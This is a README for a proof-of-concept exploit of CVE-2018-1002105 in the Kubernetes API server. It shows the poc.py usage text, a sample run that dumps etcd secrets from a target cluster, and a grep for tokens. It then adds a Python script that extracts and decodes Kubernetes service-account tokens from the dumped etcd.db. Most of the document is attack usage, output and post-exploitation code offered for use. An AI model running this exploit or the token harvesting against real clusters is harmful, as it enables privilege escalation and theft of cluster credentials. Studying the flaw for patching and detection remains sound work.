Proof-of-Concept exploit for CVE-2018-1002105. The current exploit requires create and get privileges on the pods and pods/exec resources (that is, RBAC permission to look up a pod and to exec into it). If you do not know what that means, this is probably not meant for you. :)
The current PoC dumps the secrets from the default etcd-kubernetes container.
The PoC in action:
usage: poc.py [-h] --target TARGET [--jwt TOKEN] [--namespace NAMESPACE] --pod POD

PoC for CVE-2018-1002105.

optional arguments:
  -h, --help            show this help message and exit
  --target TARGET, -t TARGET
                        API server target:port
  --jwt TOKEN, -j TOKEN
                        JWT token for service account
  --namespace NAMESPACE, -n NAMESPACE
                        Namespace with exec access
  --pod POD, -p POD     Pod with exec access
Example:
$ ./poc.py -t 10.0.2.15:6443 --jwt [token]
[*] Building pipe...
[+] Pipe opened :D
[*] Attempting code exec in pod
[*] Dumping secrets in etcd.db....
[+] Done dumping secrets!
Check for tokens (every JWT begins with eyJ, the base64 encoding of '{"', so this finds the service-account tokens embedded in the dump):
$ grep -air eyJ etcd.db
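Going one step beyond the grep, the following is an added example (not part of the PoC repository) that scans a raw dump for JWT-shaped strings, decodes each one, and keeps only those whose claims mark them as Kubernetes service-account tokens, reporting the namespace and service account they belong to. The dump bytes and the tokens inside them are constructed inline so the script runs offline; the placeholder signature is not a valid one, and the file name etcd.db is only assumed to match the PoC's output.

```python
import base64
import json
import re
import sys


def b64url(data: bytes) -> str:
    """base64url without padding, as used in JWT segments."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def make_token(namespace: str, name: str, secret: str) -> str:
    """Build a constructed, unsigned service-account token for the sample dump.
    The claim names are the ones Kubernetes puts in service-account JWTs;
    the signature is a placeholder and would not verify against any key."""
    header = b64url(json.dumps({"alg": "RS256", "kid": "sample"}).encode())
    payload = b64url(json.dumps({
        "iss": "kubernetes/serviceaccount",
        "kubernetes.io/serviceaccount/namespace": namespace,
        "kubernetes.io/serviceaccount/secret.name": secret,
        "kubernetes.io/serviceaccount/service-account.name": name,
        "sub": f"system:serviceaccount:{namespace}:{name}",
    }).encode())
    signature = b64url(b"\x00" * 32)  # placeholder, not a real signature
    return f"{header}.{payload}.{signature}"


# Constructed sample dump: binary noise around two tokens plus one decoy that
# starts with eyJ but is not a JWT (grep would report the decoy as a hit).
SAMPLE_DUMP = (
    b"\x00\x01/registry/secrets/kube-system/default-token\xff"
    + make_token("kube-system", "default", "default-token-abc").encode()
    + b"\x00\x00eyJnotatoken\x07"
    + make_token("dev", "deployer", "deployer-token-xyz").encode()
    + b"\xff"
)

# Three base64url segments separated by dots; the header always starts with eyJ.
JWT_RE = re.compile(rb"eyJ[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+")


def decode_segment(segment: bytes) -> dict:
    """Decode one base64url JWT segment, restoring the stripped padding."""
    padding = b"=" * (-len(segment) % 4)
    return json.loads(base64.urlsafe_b64decode(segment + padding))


def find_service_account_tokens(blob: bytes) -> list:
    """Return every decodable service-account JWT found in blob with its claims."""
    found = []
    for match in JWT_RE.finditer(blob):
        token = match.group(0)
        try:
            header, payload, _signature = token.split(b".")
            hdr = decode_segment(header)
            claims = decode_segment(payload)
        except (ValueError, UnicodeDecodeError):
            continue  # looked like a JWT but a segment was not base64url JSON
        if not isinstance(claims, dict) or claims.get("iss") != "kubernetes/serviceaccount":
            continue  # some other JWT; only service-account tokens are of interest
        found.append({
            "namespace": claims.get("kubernetes.io/serviceaccount/namespace"),
            "service_account": claims.get("kubernetes.io/serviceaccount/service-account.name"),
            "secret": claims.get("kubernetes.io/serviceaccount/secret.name"),
            "alg": hdr.get("alg"),
            "token": token.decode(),
        })
    return found


if __name__ == "__main__":
    # Usage: python3 find_tokens.py etcd.db  (runs on the built-in sample otherwise)
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_DUMP
    for entry in find_service_account_tokens(data):
        print(f"{entry['namespace']}/{entry['service_account']} "
              f"(secret {entry['secret']}, alg {entry['alg']})")
```

Unlike the grep, the scan discards eyJ matches that are not three decodable base64url segments, so a dump full of base64-encoded JSON produces a list of accounts rather than a wall of hits. Note that json.JSONDecodeError is a subclass of ValueError, which is why the except clause catches both bad base64 and bad JSON.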